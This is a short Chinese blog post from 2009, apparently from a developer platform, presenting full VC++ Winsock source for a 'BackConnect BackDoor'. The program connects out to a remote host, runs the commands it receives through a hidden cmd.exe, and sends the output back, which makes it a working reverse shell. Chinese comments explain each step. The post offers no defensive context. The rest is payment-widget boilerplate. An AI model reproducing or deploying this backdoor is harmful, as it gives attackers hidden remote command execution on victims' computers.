vc++反向连接后门

于 2009-03-29 18:23:00 发布
阅读量87 收藏
点赞数
文章标签: VC++ Socket Security .net

#include<winsock2.h>
#include<stdio.h>

#pragma comment(lib,"ws2_32.lib")

void main(int argc,char **argv)
{
char *messages = "\r\n======================== BackConnect BackDoor V0.1 ========================\r\n========= Welcome to Http://www.hackerxfiles.net =========\r\n";
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char buf1[1024]; //作为socket接收数据的缓冲区
memset(buf1,0,1024); //清空缓冲区

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:d\n",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80); //反向连接的远端主机端口
addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1"); //远端IP

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) //连接客户主机
{
printf("Connect failed.Error:d",WSAGetLastError());
return;
}

if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR) //发送欢迎信息
{
printf("Send failed.Error:d\n",WSAGetLastError());
return;
}

char buffer[2048] = {0};//管道输出的数据


for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline))){
SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0))
{
printf("Error On CreatePipe()");
return;
}


STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"\\cmd.exe /c");


int len=recv(sock,buf1,1024,NULL);
if(len==SOCKET_ERROR)exit(0); //如果客户端断开连接,则自动退出程序
if(len<=1){send(sock,"error\n",sizeof("error\n"),0);continue;}


strncat(cmdline,buf1,strlen(buf1)); //把命令参数复制到cmdline
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi))
{
send(sock,"Error command\n",sizeof("Error command\n"),0);
continue;
}

CloseHandle(hWrite);
//循环读取管道中数据并发送,直到管道中没有数据为止
for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048)){
send(sock,buffer,strlen(buffer),0);
}

}

}

iteye_2238
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值